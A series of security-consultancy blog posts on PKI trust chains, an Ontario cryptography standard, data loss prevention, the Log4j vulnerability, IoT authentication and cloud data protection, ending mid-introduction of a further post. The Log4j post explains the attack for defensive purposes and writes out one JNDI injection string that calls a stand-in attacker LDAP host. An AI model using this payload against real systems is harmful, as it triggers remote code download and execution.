Read time: 8 minutes

A Public Key Infrastructure (PKI) helps users to exchange data securely and provides data confidentiality, data integrity and end user authentication. PKI uses public-private keypair received from a trusted Certificate Authority. The certificate authority issues public key certificates that can be used to encrypt data or for digital signatures. A public key certificate is used to associate an identity with a public key. The entity that creates this association is known as the issuer of the certificate and the identity to whom the certificate has been issued is known as the subject of the certificate.When a user visits a secure website, the website sends an SSL/TLS certificate to the user’s browser. The user’s browser validates if the issuer of this certificate exists in its list of trusted Root Certificate Authorities. If the browser cannot find a match, it checks if any of the trusted Root Certificate Authority has signed the issuing CA certificate. The browser continues to validate the issuer of the certificate until it finds a trusted Root certificate, or it reaches the end of the trust chain. This chain of trust helps to prove that the certificate comes from a trusted source and the website the user is visiting is a secure website.
A certificate chain is a chain of digital certificates, starting with an end entity certificate, one or more intermediate certificates and a root certificate.

Basic Entities in the chain of trust

There are three basic entities in the certificate chain of trust: Root CA Certificate, Intermediate CA Certificate, and end entity certificate.

  1. Root CA Certificate:The Root CA certificate is a self-signed X.509 certificate. This certificate acts as a trust anchor, used by all the relying parties as the starting point for path validation. The Root CA private key is used to sign the Intermediate CA certificates. If this certificate and its private key is compromised, then the entire certificate chain breaks down and all the certificates signed by this private key will be affected. Hence the Root CA private key must be securely generated and protected at all times. To protect Root CA certificates, intermediate CAs are placed between Root CA and end entities and Root CA never issues certificates to end entities directly. The operating systems, web browsers and custom applications come pre-installed with more than 100 trusted root CA certificates.
  2. Intermediate CA Certificates:The intermediate CA certificate sits between the Root CA certificate and the end entity certificate. There can be one or more intermediate CA certificates in the chain of trust. The intermediate CA certificate signs the end entity certificates. This provides an additional layer of security to the Root CA as it can be securely kept offline most of the times.
  3. End Entity Certificates:The end entity certificate is the server certificate that is issued to the website domain. When this server certificate is installed on the web server, the URL is changed to HTTPS. This indicates that the website is secure and uses encrypted connection. To receive a digital certificate, an end entity sends a Certificate Signing Request (CSR) to the Issuing CA (Intermediate CA). The CSR contains details about the end entity. The Issuing CA verifies that the information provided is correct and issues the certificate to the end entity.


Types of Trust Models

Hierarchical Trust Model

In the PKI hierarchical trust model, there is an offline Root CA and multiple online Issuing CAs. The multiple Issuing CAs are for high availability and load balancing. This is the most common chain validation process, and it moves in reverse. In this case the validation starts by checking the end entity certificate information against the intermediate certificate that issued the certificate and then checks the intermediate certificate information against the root certificate that issues this certificate.

Web of Trust Model

The web of trust model is an alternative to the hierarchical trust model. It is a decentralized trust model where users manage the trust at the individual key level. There is no certificate authority or a trusted root. Decentralized control of each key pair is the main difference from the hierarchical trust model. PGP (Pretty Good Privacy) uses this trust model.

Certificate Path Validation

Path validation is the process of verifying the integrity of the certificate chain, from the end entity to the Root CA. There are some certificate fields and extensions that are used in path validation. These fields are used to define the identity of the certificate and the links between certificates.

  1. Issuer Distinguished NameThe name of the issuer that signed the certificate.
  2. Subject Distinguished NameThe identity of the certificate holder.
  3. Public KeyThe public key of the asymmetric keypair.
  4. Authority Key Identifier (AKI)The certificate extension that contains the key identifier that is derived from the public key in the issuer certificate.
  5. Subject Key Identifier (SKI)The certificate extension that contains the key identifier that is derived from the public key in the subject certificate.

The subject of higher-level certificate is the issuer of the lower-level certificate in the chain. The client searches at different locations to find the certificate that matches the issuer DN in its own certificate. The Distinguished Name (DN) is used to find the certificates and the AKI and SKI values are used to determine if it is a correct certificate. If a certificate authority generates a new keypair, then the SKI value within the certificate should change. The DN of the certificate authority does not change during the rekey process. So, the AKI and SKI values ensure that correct certificate is selected to build the chain. When a client finds multiple trusted certification chains during the certificate chain building process, the best certification chain is selected by calculating each chain’s score. This score is based on the quantity and the quality of the information that the certificate path provides. If the score is the same for multiple chains, then the shortest chain is selected.

Cross Certification

Cross certification is the process of interconnecting two PKIs to build certificate chains. The two CAs involved in cross certification sign each other’s CA certificate to establish the relationship in both directions. After the two certificate authorities have established the trust, entities within the separate PKIs can interact with each other depending on the policies mentioned in the certificates.

Certificate Stores

  1. Microsoft Certificate StoreMicrosoft operating system has built-in certificate stores for trust anchors. Microsoft uses the windows update service to publish trusted root certificates to the certificate stores. The Microsoft Root CA program validates and manages the eligibility for publication of root certificates.
  2. MAC OSX and SafariMAC OSX implements a certificate store. MACOSX certificate store is a combination of a certificate store and a password manager. By default, the system has two key chains known as login and system keychains. The user can create more key chains.
  3. Firefox and other Mozilla based browsersMozilla includes a PKCS#11 module that contains trusted root certificates. The user cannot update this certificate store. A user can load additional trusted root CA certificates into the user database.
  4. OpenSSLOpenSSL stores trusted root CA certificates in unencrypted pem files. File system security is very important to protect these files.
  5. JAVA: For JAVA, the trusted root CA certificates are stored in encrypted form at
    <JAVA path>/lib/security/cacerts.The user can update this certificate store.

Conclusion

The certificate chain of trust is a list of certificates from end entity to the trust anchors. It enables the receiver to verify that the sender and all intermediate certificates are trustworthy. By using certificate fields and extension values, Path validation verifies the integrity of the certificate chain, from the end entity to the Root CA. There are different certificate stores that are used to store trusted root certificates. Encryption Consulting is a customer-focused cyber security consulting firm providing services to various clients on implementing and managing PKI in their environments. To see how we can help your organization, visit our website at www.encryptionconsulting.com.

About the Author

Search any posts

A collection of Encryption related products and resources that every organization should have!

Free Downloads

Datasheet of Encryption Consulting Services

Encryption Consulting is a customer focused cybersecurity firm that provides a multitude of services in all aspects of encryption for our clients.

Download

Read time: 8 minutes

The Government of Ontario Information Technology Standards (GO-ITS) provide guidelines, standards, and practices for the Ontario Public Service. It defines the requirements and best practices to protect the Government of Ontario’s computer systems and networks. GO-ITS 25.12 defines the requirements for the use of cryptography and its type and strength within the Government of Ontario.

In the standard, the requirements associated must mean that the condition is mandatory, and the requirements related should imply that they are recommendations. These requirements apply to all the vendors, agencies, ministries, and third parties under contract with the Government of Ontario.

Cryptography is used to protect the confidentiality and integrity of sensitive information.

The cryptographic algorithms that are used for these purposes are:

  1. Symmetric Encryption

    Symmetric Encryption involves using a single key for both encryption and decryption of the information. The key is shared between the entities through a secure channel. Symmetric encryption is primarily used to ensure confidentiality. The main advantages of symmetric encryption are speed and ease of understanding.

  2. Asymmetric Encryption

    Asymmetric encryption uses a unique key pair for each user. The keypair consists of a public key that is known to everyone and a private key that is never shared and must be kept secret. Asymmetric encryption is primarily used for digital signatures and key management within large groups of users.

  3. Hash Functions

    These are one-way functions that map a variable-length input to a fixed-length output string. Secure hash functions are primarily used to protect data integrity.

The management of encryption keys is essential for the secure use of cryptographic techniques. Key management is the process of managing the encryption keys throughout their lifecycle, including secure generation, storage, distribution, use, and destruction.

Requirements of GO-ITS

As per the standard, cryptographic material must be securely protected, including creation, storage, distribution, use, revocation, destruction, and recovery of keys. The requirements are subdivided as per different areas:

Education and Training

  • Technical staff that develops, implements, or manages the systems must be aware of the cryptography requirements as per the standard.

Information in Storage

  • Sensitive information should be encrypted in storage or stored operationally using secure hash functions.
  • Encrypted sensitive data stored for more than two years must be encrypted as per a high-risk environment.
  • If the responsibility of the encrypted data is transferred to another organization and the previous organization is no longer authorized, the data must be encrypted by the new organization with a new key.
  • Mobile devices such as smartphones, tablets, removable media, portable computers that are processing or storing sensitive data must encrypt the entire device storage.
  • If sensitive data is stored on desktop computers, the data must be encrypted.
  • Sensitive data must be encrypted at the column or data field/cell level before being written to a data repository.

Communications Security

  • Sensitive information must be encrypted in transit using appropriate means.
  • The integrity of sensitive data must be verified using an approved message authentication code or digital signature. Digital signatures must use an accurate timestamp from a valid reference time source.

Cryptography deployment

  • All cryptography applications must use a random number generator or pseudo-random number generator; check the validity of certificates and use only valid certificates.
  • Applications must securely delete decrypted information retained in the cache or temporary memory immediately after completing the related activity.
  • Applications that process and access sensitive data must undergo security testing and evaluation (STE) prior to implementation.

Protection of cryptographic materials

  • Access to the cryptographic materials must be restricted to authorized users, applications, or services.
  • Cryptography keys must be protected as per the sensitivity of the information they are protecting.
  • Wherever possible, keys should be generated via a secure software module or a Hardware Security Module. For the generation of keys that protect sensitive information, the modules should be on-premises.

Hardware Security Modules (HSMs)

Hardware security modules are used for secure key generation, storage, and management of cryptographic keys.

  • HSMs must be compliant with FIPS 140-2 level 2.
  • If HSMs are storing highly sensitive information and are located off-premises, then they should be compliant with FIPS 140-2 level 3.
  • They must be deployed in a manner to reduce exposure to attacks.
  • They must be operated as per least privilege and segregation of duties principles.
  • They must be monitored and audited.
  • HSM firmware must be securely managed.

Key Management:

  • Key management procedures must be developed for all applications using cryptographic systems to protect sensitive data.
  • Key management procedures must address key generation, key assignment, key revocation, re-keying, key distribution, and key destruction.
  • Keys created for test purposes must not be used in a production environment, and production keys must not be used in a test environment.

Recovery of encrypted information

  • Cryptographic services must have a secure mechanism to recover symmetric and asymmetric decryption keys to decrypt the encrypted data in storage.
  • Decryption keys must be recoverable after their expiration to enable decryption of data in archived backups.

Symmetric algorithm modes of operation

  • The Electronic Code Book (ECB) mode of operation must not be used.
  • AES Galois/Counter Mode (GCM) should be used instead of CBC mode.
  • When using the GCM mode of operation, avoid repeating Initialization Vectors (IVs) with a given key or encrypting more than 264 blocks with a given key.

Transport Layer Security

  • Internet browsers, applications, and systems must support TLS.
  • TLS 1.2 and 1.3 should be used.
  • The SSL protocol and early versions of TLS protocol must not be used as they are vulnerable to attacks.
  • TLS cipher suite algorithms must be selected as per the approved cryptographic algorithms and minimum key length.
  • Client or server connections that request the use of weaker protocols or a reduction in the strength of cryptographic systems must be denied.

Emerging Threats

Emerging technical threats that could pose a significant challenge to the existing cryptography must be addressed. Cryptographic agility, understanding interoperability requirements and relevant supply chains, asset management, and risk management are the best courses of action regarding potential threats against cryptography.

About the Author

Search any posts

A collection of Encryption related products and resources that every organization should have!

Free Downloads

Datasheet of Encryption Consulting Services

Encryption Consulting is a customer focused cybersecurity firm that provides a multitude of services in all aspects of encryption for our clients.

Download
Challenge Solution Benefits
  • No documented data loss prevention requirements
  • No identification of data loss channels within the organization
  • Users capable to access, copy and send sensitive data outside of the company, including across borders
  • No defined implementation roadmap for DLP technologies
  • Gained understanding in the sensitive data flow around data management platforms and integrated customer data sources
  • Developed use cases and requirements for DLP solution.
  • Performed vendor analysis.
  • Developed a detailed implementation plan including high-level architectural diagram.
  • Implementation of the DLP solution.
  • A well-documented and consolidated data loss prevention requirements
  • Defining governance and technology to manage DLP program.
  • Periodic re-assessment process for DLP program (data classification, DLP policy review/refresh, DLP process, etc.)

About the Author

Search any posts

A collection of Encryption related products and resources that every organization should have!

Free Downloads

Datasheet of Encryption Consulting Services

Encryption Consulting is a customer focused cybersecurity firm that provides a multitude of services in all aspects of encryption for our clients.

Download

Read time: 5 minutes

The average cost of a data breach in the US rose to $4.24 million in 2021. Remote work due to the COVID-19 pandemic was a major factor in increasing this cost. For large organizations, this cost could be even higher. The cost of the data breach was highest in the Healthcare industry. Many organizations face a challenge of keeping track of all their data. One of the reasons for this is that employees now use multiple devices and store data at different locations such as desktops, laptops, smartphones, notebooks, file servers, and on the cloud. They also use multiple communication channels such as email, shared online folders, social media, and collaborative software to send and share data. Due to these reasons, many organizations are unable to track sensitive data leaving the organization and prevent data loss.

Organizations need to protect sensitive data due to multiple industry and government regulations such as HIPAA and PCI-DSS.

Data Leak Causes

The main causes of data leaks within an organization are:

  1. Data exfiltration by cyber criminals

    Cybercriminals target sensitive data and use multiple techniques like phishing, malware, social engineering, and injection attacks to gain access to the organization’s sensitive data and exfiltrate it.

  2. Unintentional data exposure

    Some of the data leaks happen due to human errors. An employee might misconfigure access to sensitive data in the cloud or expose secrets in code repositories.

  3. Malicious insiders

    A disgruntled employee might compromise privileged user accounts to exfiltrate sensitive data outside the organization.

Encryption Assessment

Data Loss Prevention

Data Loss Prevention is a set of tools and processes that are used to detect and prevent unwanted destruction, unauthorized access, and exfiltration of sensitive data. Organizations use DLP to protect their sensitive data and to comply with regulatory compliances such as HIPAA, GDPR, PCI-DSS, etc. DLP solutions use rules to classify and protect sensitive data so that users cannot accidentally or maliciously exfiltrate sensitive data from the organization. DLP solutions monitor endpoints and networks to protect data-at-rest, in-motion and in-use.

Use Cases for DLP

The main use cases for DLP in an organization are:

  1. Compliance

    The organizations that collect and store Personally Identifiable information (PII), payment card information or protected health information (PHI) need to adhere to compliance regulations such as GDPR, HIPAA and PCI-DSS. A DLP solution helps the organization to follow these regulations by identifying, classifying, and monitoring sensitive data.

  2. IP protection

    A DLP solution also helps an organization classify its intellectual property and protect against unauthorized access and exfiltration of trade secrets.

  3. Data visibility

    A DLP solution can also help an organization track data-at-rest and in-motion on endpoints, networks, and cloud. This provides organizations with more visibility into the types of data stored on the endpoints and in the cloud.

Types of DLP Solutions

There are multiple ways to steal data from an organization. The DLP solution should be able to detect the many ways the sensitive data could be exfiltrated from an organization. The different types of DLP solutions are:

  1. Endpoint DLP

    An endpoint DLP solution monitors data on the devices in the network. This solution is installed on endpoints like laptops, servers, smartphones, printers, etc, to monitor and protect the data residing on them. Endpoint DLP protects data on these endpoints even if the endpoint is offline or connected to a public network. This solution also prevents transferring of sensitive data to USBs.

  2. Network DLP

    This DLP solution is implemented on the network and monitors data-in-transit. All the incoming and outgoing data can be monitored, protected, and blocked from any device connected to the network. The DLP policies can be enforced on all the devices connected to the network. This solution can only protect data on the devices connected to the network and cannot protect data on offline devices.

  3. Email DLP

    The email DLP solution monitors and filters emails based on certain keywords. This solution can reduce the data leakage through emails.

  4. Cloud DLP

    A cloud DLP solution monitors and protects the data stored in the cloud. The solution can protect and monitor emails, documents, and other types of files.

DLP Best Practices

To develop an effective DLP program, the recommended best practices are:

Determine the primary data protection objective in order to determine the appropriate DLP solution for the organization.

Implement a centralized DLP program and work together with different business units and departments to define consistent DLP policies that govern the organization’s data. This will increase data visibility across the organization.

Conduct an assessment on the types of data and its value to the organization. Identify the data, whether it is sensitive data and its storage locations. Evaluate the data exit points. Then evaluate the risk to the organization for each type of data if it is leaked.

Create a data classification system for both structured and unstructured data. Data classifications might include internal, confidential, public, personally identifiable information (PII), intellectual property, and others.

Create data handling and remediation policies for different types of data. DLP solutions have pre-configured rules based on various regulations such as GDPR, HIPAA, etc. These rules can be customized as per the organization’s needs. Develop controls for reducing data risk. Organizations should develop granular, fine-tuned controls to reduce the specific data risks.

Educate employees to reduce the risk of accidental data loss by insiders. Employee awareness and understanding of security policies is very important for a successful data loss prevention program. Awareness programs and trainings such as posters, emails, online trainings, and workshops can help in improving the employee understanding and adherence to data security policies and best practices.

Conclusion

Organizations need to protect sensitive data-at-rest, in-transit and in-use. They also need to ensure that data is protected on all devices and on the network, considering the different data exit points. A robust DLP solution can help organizations ensure data protection on all devices and in different stages of the data lifecycle. Encryption Consulting is a customer-focused cyber security consulting firm providing services to various clients on implementing and managing DLP in their environments. To see how we can help your organization, visit our website at www.encryptionconsulting.com

About the Author

Search any posts

A collection of Encryption related products and resources that every organization should have!

Free Downloads

Datasheet of Encryption Consulting Services

Encryption Consulting is a customer focused cybersecurity firm that provides a multitude of services in all aspects of encryption for our clients.

Download

Read time: 5 minutes

In the last month, you have likely seen the Log4j exploit in the news. A critical Remote code execution vulnerability, CVE-2021-44228, was discovered in December in Apache Log4j and it has affected millions of servers. Cloudflare has declared that the company has tracked more than 100k attempts per hour to exploit this vulnerability. Microsoft has observed that the vulnerability is being used by multiple nation-state hacking groups from China, North Korea, Iran, and Turkey. The exploitation attempts were high during the last week of December as well.

What is Log4j?

Apache Log4j is an open-source logging library that is widely used in almost every environment where a Java application is in use. This includes enterprise applications, cloud services, web applications, email services, and open-source software. This library is used to log security and performance information.

What is the issue?

The vulnerability leverages JNDI (Java Naming and Directory Interface) lookups, that are allowed in the default configuration of Log4j. JNDI is a Java API that clients use to lookup data and objects stored in different directory and naming services such as Lightweight Directory Access Protocol (LDAP), Domain Name System (DNS), and Remote Method Invocation (RMI). The API uses a string as an input parameter and this input parameter can be exploited by a remote attacker to execute arbitrary code. Log4j does not sanitize the input parameters, allowing an attacker to provide a string as a variable that could be used to load and invoke a remote Java class file. An attacker with the ability to control log messages can execute remote code loaded from LDAP servers when message lookup substitution is enabled and gain full control of the affected server. An attacker can exploit this vulnerability by following the below steps:

  1. An attacker creates a specially crafted string containing the malicious payload and sends it to a vulnerable system. This string could be inserted in any of the fields that the system logs such as
    • User Agent
    • Username
    • Device Name or email address
  2. The string points to an attacker controlled LDAP or DNS server, such as

    ${jndi:ldap://evil-hack.com/a}.

    This string is then sent to Log4j for logging

  3. The vulnerable system uses JNDI to query the attacker-controlled LDAP or DNS server.
  4. The attacker-controlled LDAP or DNS server responds with a remote Java class file (exploit.class)
  5. The Java class is downloaded and executed.


Severity of the issue

The impact of the exploit is very broad due to the nature of the vulnerability. Log4j is widely used by developers and to exploit the vulnerability, an attacker only needs to exploit the target system to log a specially crafted message. Attackers are extensively exploiting this vulnerability for crypto mining and other types of malware attacks. Cybercriminals exploit a new vulnerability to take advantage of it before it is remediated. In the case of Log4j, as it is so widely used by developers in almost every Java application, it provides a larger window for cybercriminals to exploit this vulnerability before the organization can patch their entire network and applications on the network. Security experts have warned that because of the Java packing, the vulnerability could be several layers deep within the applications and not easily detected by scanners. Though the exploit is currently aimed at crypto mining, it could be exploited by serious threat actors to attack high-value targets such as financial institutions and federal agencies. Attackers are scanning both Windows and Linux systems for this vulnerability.

How to mitigate the risk?

An organization can follow the below recommendations to handle this vulnerability:

  • In order for an organization to identify the affected applications and systems, scanning tools and scripts must be deployed to detect vulnerable systems in the environment.
  • As a workaround, the JndiLookup class can be removed from the class path.
  • Apply the corresponding security patches for public-facing applications and systems immediately.
  • Apply the corresponding security patches for internal applications and systems as soon as possible.
  • Check your network perimeter logs for indicators of compromise.
  • If you are using a WAF, create rules specific to log4j.
  • Isolate the vulnerable systems through network segmentation or other means.
  • Monitor for suspicious activities with particular attention to applications that establish remote connections.
  • Consider implementing zero trust architecture.

Zero Trust Architecture

An important element in all malware attacks is that the attacker uses the organization’s applications and systems against the organization itself. Organizations should consider implementing zero trust architecture to protect the organization from its own applications and systems. Zero trust is an approach that secures an organization by rejecting implicit trust and continuously validating every request. It is based on the principle of “never trust, always verify”. Every access request is first authenticated, authorized, and encrypted before providing access to the resource. Zero trust architecture is based on three key principles:

  1. Verify explicitly

    Always authenticate and authorize requests based on user identity, device, location, service, workload, and other parameters.

  2. Use least privilege

    Restrict user’s access to only those resources required for the job role. Use risk-based policies and data protection to secure data and systems.

  3. Assume breach and inspect every activity

    Use analytics to get visibility of the network, systems, and applications, and improve defenses.

Identity has become the new network perimeter and verification of these identities is central to the zero-trust architecture. Instead of identification based on IP address, it’s based on verifying the user’s identity using Identity and Access Management (IAM), Multi-Factor authentication (MFA) and Public Key Cryptography (PKI). In addition to identity verification, organizations need to ensure device verification as well by using certificates and key pairs, to strengthen the security of the organization. Data needs to be protected when at rest and in transit. This makes encryption, especially PKI, an important part in implementing zero-trust architecture. PKI allows an organization to establish machine identity and encrypts communications between networks. Organizations can use PKI to issue digital certificates to users, machines, web applications and mobile devices, to provide secure network authentication.

Conclusion

Organizations need to strengthen the security of their systems and applications against such vulnerabilities and exploits, and to do this they need to move towards a zero-trust architecture. Implementing a PKI is important for zero trust architecture and ensuring secure network authentication for users, systems, and web applications. Encryption Consulting is a customer-focused cyber security consulting firm providing services to various clients on implementing and managing PKI in their environments. To see how we can help your organization, visit our website at www.encryptionconsulting.com.

About the Author

Search any posts

A collection of Encryption related products and resources that every organization should have!

Free Downloads

Datasheet of Encryption Consulting Services

Encryption Consulting is a customer focused cybersecurity firm that provides a multitude of services in all aspects of encryption for our clients.

Download

Read time: 6 minutes

Internet of Things, or IoT, devices are everywhere in the world, whether you are at home, in the office, or just on the Internet in general. An IoT device is any type of device that connects to a network to access the Internet, so Personal Computers, cellphones, some speakers, and even some outlets are considered IoT devices. Today, even cars and airplanes use IoT devices, meaning if these devices are attacked by threat actors, then cars or airplanes could be hijacked or stolen. With such a widespread use of IoT devices in place in our world, authenticating and authorizing IoT devices within your organization’s network has become vital. Allowing unauthorized IoT devices onto your network can lead to threat actors leveraging these unauthorized devices to perform malware attacks within your organization.

Software-Based IoT Authentication

Before talking about specific ways to give authorization to IoT devices, we should first take a look at some of the general, software-based authentication methods available to Internet of Things devices.

  • One-way authentication: When two devices are both attempting to communicate with each other, one-way authentication can be used to authenticate only one of the devices as opposed to both. This is similar to how a client-server relationship works, where the client is just authenticating itself with the server, not the other way around. An example of one-way authentication could be signing onto a server with a username and password.
  • Two-way authentication: Similar to one-way authentication is two-way authentication, where both parties authenticate themselves to each other. An example of two-way authentication could be a SSL/TLS handshake.
  • Three-way authentication: Three-way authentication is also another method of authentication used. Three-way authentication uses a central point, like a server, to authenticate both of the devices attempting to communicate, with the central point itself as well as with each other. An example of three-way communication could be using a server that is trusted by both communicators to trust each other.
  • Distributed authentication: Another method of authentication used with IoT devices is Distributed authentication. Distributed authentication uses a distributed system to authenticate the two communicating parties.
  • Centralized authentication: Similar to distributed authentication is centralized authentication. Instead of using a distributed system to authenticate the parties, a centralized location system is used for authentication. One final way to authenticate devices is one of the more common methods: two-factor authentication. When logging into a network, a user may use a username and password and two-factor authentication. Two-factor authentication can be verifying the user’s identity by sending an email or text message to the user, or scanning a QR code, thus authenticating that device.

These are commonly used methods of authentication for the most part, but the following hardware-based authorization methods are found more commonly in larger organizations.

PKI Assessment


Hardware-Based Authorization Methods

As I mentioned previously, hardware-based authorization methods are more commonly used within an organization, as they provide the most widespread and secure method of authenticating IoT devices within a network. One of these hardware-based methods is the use of Hardware Security Modules. Hardware Security Modules, or HSMs, are used to securely store private keys from asymmetric key pairs. An asymmetric keypair has a public and private key mathematically linked together. The private key, as the name suggests, is kept private while the public key can be viewed by anyone. When discussing IoT device authentication, devices within a network will have an asymmetric keypair, and a digital certificate associated with that keypair, connected to the device being authenticated. If the certificate provided to the HSM contains a public key linked to the private key stored within the HSM, then that device is allowed access to the network. If not, it’s access is denied. 

Another method, usually used in conjunction with HSMs, is the use of a Public Key Infrastructure. A Public Key Infrastructure, or PKI, is a connection of Certificate Authorities stemming from a Root Certificate Authority, which create and distribute certificates to authorized devices in a network. These certificates can be traced back to the trusted Root Certificate Authority (Root CA), authorizing the IoT device connected to that certificate to use the organization’s network. Most PKIs will integrate an HSM with their PKI systems, to provide the highest level of security. The HSM handles the storage of the private keys of the certificates generated by the CAs. If a valid certificate, with a valid certificate chain connecting the certificate to the Root CA, is not found, then the device will not have any access to the network utilizing the PKI.

Some organizations will set up a Trusted Execution Environment (TEE) to protect their network and any sensitive data stored within that network. TEE is set up within a device that connects to an organization and uses high level encryption to authorize that device to be able to connect to and use an organization’s network. TEE is used in many organizations because it does not overtax the systems in place in a device, but instead uses a minimal amount of computing power to function. One final authentication method that organizations will often use is a Trusted Platform Module. A Trusted Platform Module, or TPM, is a microchip that is put into an IoT device which completes the process of IoT device authentication due to the host-specific encryption keys stored within it. The chip, and the keys held within, are not accessible from software, so an attacker would not be able to leverage the chip to gain access to a network. When connecting to a network using TPMs, the chip provides a key and the network compares that key to known host keys. If they match with one of the known host keys, then access is granted.

Conclusion:

These are just a few of the many different solutions available for IoT device authentication available to organizations. Choosing the right solution is very important, as not every organization has the same needs and wants for their IoT device security. It is important to have a detailed discussion within your cybersecurity team to determine what important points this authentication method must deal with, and how vast it needs to be spread. If your organization is massive and has minimal sensitive information, a TPM would likely not be the way to go as security does not need to be so strict and putting a chip in every device on the network would be extremely expensive. Something to note with these systems is that many of them would need to be handled manually. IoT management platforms can help with this as they allow an organization to manage security tools and get health reports on hundreds of IoT devices in their life using that portal. For any consultation needs relating to PKI or HSM work, visit our website at www.encryptionconsulting.com.

About the Author

Search any posts

A collection of Encryption related products and resources that every organization should have!

Free Downloads

Datasheet of Encryption Consulting Services

Encryption Consulting is a customer focused cybersecurity firm that provides a multitude of services in all aspects of encryption for our clients.

Download
Challenge Solution Benefits
  • No Certificate discovery and tracking mechanism.
  • Manual Certificate revocation process.
  • No tracking of private keys and certificate usage.
  • No monitoring of certificate expiration and renewal processes.
  • Certificate requests for IoT devices and Kubernetes clusters was a manual process.
  • Certificate distribution was a manual process.
  • No auditing on the keysize and signing algorithm used by the Certificates.
  • Multiple PKIs running in the environment and lack of visibility on the PKIs.
  • No visibility on the key regeneration process.
  • Deployed CertSecure Manager for managing certificates across multi-cloud environments and Kubernetes clusters.
  • Allowed administrators to define policies adhering to organization’s business policies.
  • Allowed users to manage and monitor certificate requests.
  • Provided granular access control for end-to-end certificate lifecycle management based on user or role.
  • Provided visibility into Kubernetes environment.
  • Centralized certificate lifecycle management solution for multi-cloud and Kubernetes.
  • Granular access control system based on user or role.
  • Customizable workflows to manage and monitor certificate requests.
  • Extensive reporting functionalities to provide visibility into certificate usage and enterprise security posture.


Design your Certificate Lifecycle System

About the Author

Search any posts

A collection of Encryption related products and resources that every organization should have!

Free Downloads

Datasheet of Encryption Consulting Services

Encryption Consulting is a customer focused cybersecurity firm that provides a multitude of services in all aspects of encryption for our clients.

Download

Read time: 3 minutes 42 seconds

Cloud computing is increasingly being adopted by many organizations today. It offers convenient access to a shared pool of computing resources like infrastructure, platforms, storage, data, software, and applications as a service to its users. Many organizations are moving to the cloud, as it helps in collaboration, improves scalability, availability, flexibility, and productivity, along with reduced operational costs.

Gartner has predicted that spending on public cloud services will grow by 23.1% in 2021 to a total of $332.3 billion. The COVID-19 pandemic and shift to remote working has forced companies to move their workloads from on-premises to the cloud. Apart from this, many emerging technologies such as containerization, edge computing, and analytics are driving the additional growth of cloud computing.

Cloud computing provides multiple advantages, but there are still many security issues that are of great concern to organizations. Organizations are saving their critical applications and customer’s personal data in the cloud, and securing those applications and data is critical for their business. There have been multiple security incidents in the past few years where companies failed to secure customer’s sensitive data in the cloud. In January 2020, over 250 million Microsoft customer records were exposed online without proper protections. In 2021, a massive data leak exposed LinkedIn profiles of 700 million users. The personal data of the affected users was put up for sale on a dark web forum. The exposed data included Personally Identifiable Information (PII) of users such as Full Names, email addresses, home addresses, phone numbers etc.

Along with the organizations, the focus of hackers has also shifted from on-premises data to cloud data. According to a survey, almost every organization has experienced a cloud data breach in the past 18 months. Gartner has stated in its cloud security assessment report that by 2025 99% of the cloud security failures will be due to the security issues on the customer’s side rather than the cloud provider side.

In the current scenario, if businesses want to expand their cloud usage, they need to protect the sensitive data in the cloud and strengthen the overall cloud data security. If companies want to benefit from cloud computing, alongside securing customer’s data and trust, they need to develop a secure architecture for data protection in the cloud.

Encryption Assessment

Organizations’ Concerns for cloud data security

When an organization moves its sensitive data to the cloud, it has many concerns and questions related to the storage and protection of data in the cloud. Some of these concerns are:Does the cloud provider have sufficient security capabilities and supported technologies?Is the cloud provider adhering to the needed compliance regulations and specifications?What are the security protocols being used by the cloud provider?How the cloud provider is storing data?Is the cloud provider saving the sensitive data on the same physical host with other tenants?Is the cloud provider ensuring the physical security of the servers storing the data?Does the cloud provider have access to the organization’s data?Does the cloud provider protect the data at rest as well as in-transit?What are the different encryption technologies the cloud provider is using?Does the cloud provider have access to the encrypted data?How the encryption keys are stored and protected?Does the cloud provider have access to the encryption keys?How the encryption keys are refreshed and rotated?Does the cloud provider follow breach notifications as per company’s policies and standards?How to manage data across multi-cloud environments?How to protect data in multi-cloud environment?How to manage keys in multi-cloud environment?

Developing Architecture for Data Protection

Cloud customers need to take control of securing their sensitive data in the cloud rather than relying only on the cloud provider to protect their data. Organizations should ensure that the cloud data protection architecture satisfies the below recommendations:

  1. Sensitive data is protected at rest, in transit and in use.
  2. Sensitive data should always be encrypted at the organization side before it is transmitted to the cloud for storage.
  3. The encryption keys should be controlled by the organization and not the cloud provider.

Encryption keys are a fundamental component of any cryptographic system, and they should be always protected from unauthorized access. In data encryption, key management is the most difficult part. It becomes even more complex in cloud and multi-cloud environments. Key management refers to the management of encryption keys. It includes key generation, key storage, key rotation, key usage, key access, and key destruction. A key management service allows the customers to manage their own keys that are used to encrypt the data in the cloud. Most of the cloud providers provide Key Management services. Organizations can use cloud-based encryption in which the cloud provider generates and manages the keys that are used to encrypt and decrypt the data. Organization can use Bring Your Own Key (BYOK) in which they generate and manages the encryption keys, but the cloud provider has access to the keys. Organizations can also generate, manage, and store their encryption keys in their own environments and the cloud provider does not have any access to the keys.In order to take advantage of the various cloud tools and platforms, organizations need to create a data centric security strategy to protect their sensitive data in the cloud. It is impossible to develop a single data-protection solution for the cloud as it involves multiple aspects. Security of the data needs to be analyzed from multiple aspects and a robust and secure cloud data protection architecture should be created. Organizations need to understand the built-in security provided by the cloud providers and how to use them to our advantage. Most of the cloud providers provide both at rest and in-transit encryption that can be utilized to secure data in the cloud. Strong access controls and password policies must be implemented to secure our data.

Conclusion

Encryption Consulting can help you identify and secure your sensitive data in the cloud, understand and utilize the data protection methods provided by the cloud providers, manage your keys in multi-cloud environments, adherence to privacy regulations and compliances, and strengthen your organizations’ cloud data security.

About the Author

Search any posts

A collection of Encryption related products and resources that every organization should have!

Free Downloads

Datasheet of Encryption Consulting Services

Encryption Consulting is a customer focused cybersecurity firm that provides a multitude of services in all aspects of encryption for our clients.

Download

Read time: 8 minutes, 30 seconds

In this discussion whiteboard, let us understand what is PKI? What are several components involved in Public Key Infrastructure (PKI)? Most importantly, how the recent global pandemic situation across the world is forcing companies to prefer remote working facilities and this in turn is posing a lot of threat for firm’s sensitive data. To secure the sensitive data, we need to understand how to scale the Public Key Infrastructure remotely in order to defend various data breach attacks. Let’s get into the topic:

Is still Cyber security practices such as Public Key Infrastructure still relevant during COVID-19 Pandemic Era?

